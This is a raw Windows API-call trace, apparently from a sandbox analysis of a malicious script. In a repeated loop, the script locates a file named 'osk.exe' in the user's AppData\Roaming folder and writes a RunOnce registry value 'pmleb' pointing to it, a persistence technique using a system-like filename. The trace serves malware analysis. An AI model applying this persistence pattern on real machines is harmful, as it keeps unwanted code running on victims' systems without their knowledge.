[0079.816] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.816] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.816] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.816] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.816] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0079.816] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.816] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x54 [0079.816] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.817] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x53 [0079.817] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.817] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.817] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.817] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.817] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.817] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.818] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.818] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.818] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.818] RegCloseKey (hKey=0x280) returned 0x0 [0079.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.818] SetTimer (hWnd=0x20280, nIDEvent=0x2053, uElapse=0xa, lpTimerFunc=0x0) returned 0x2053 [0079.818] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.831] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.831] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.831] KillTimer (hWnd=0x20280, uIDEvent=0x2053) returned 1 [0079.831] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.831] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.831] IUnknown:Release (This=0x787518) returned 0x1 [0079.831] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.831] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.832] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.832] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.832] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.832] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0079.832] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0079.832] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x55 [0079.832] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.833] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x54 [0079.833] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.833] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.833] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.833] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.833] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.833] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.833] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.833] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.834] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.834] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.834] RegCloseKey (hKey=0x280) returned 0x0 [0079.834] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.834] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.834] SetTimer (hWnd=0x20280, nIDEvent=0x2054, uElapse=0xa, lpTimerFunc=0x0) returned 0x2054 [0079.834] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.846] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0079.846] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.846] KillTimer (hWnd=0x20280, uIDEvent=0x2054) returned 1 [0079.847] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.847] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.847] IUnknown:Release (This=0x787518) returned 0x1 [0079.847] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.847] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.847] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.847] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.848] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0079.848] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.848] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x56 [0079.848] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.848] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0079.849] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.849] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.849] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.849] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.849] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.849] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.849] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.849] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.849] RegCloseKey (hKey=0x280) returned 0x0 [0079.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.850] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.850] SetTimer (hWnd=0x20280, nIDEvent=0x2055, uElapse=0xa, lpTimerFunc=0x0) returned 0x2055 [0079.850] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.862] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.862] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.862] KillTimer (hWnd=0x20280, uIDEvent=0x2055) returned 1 [0079.862] 
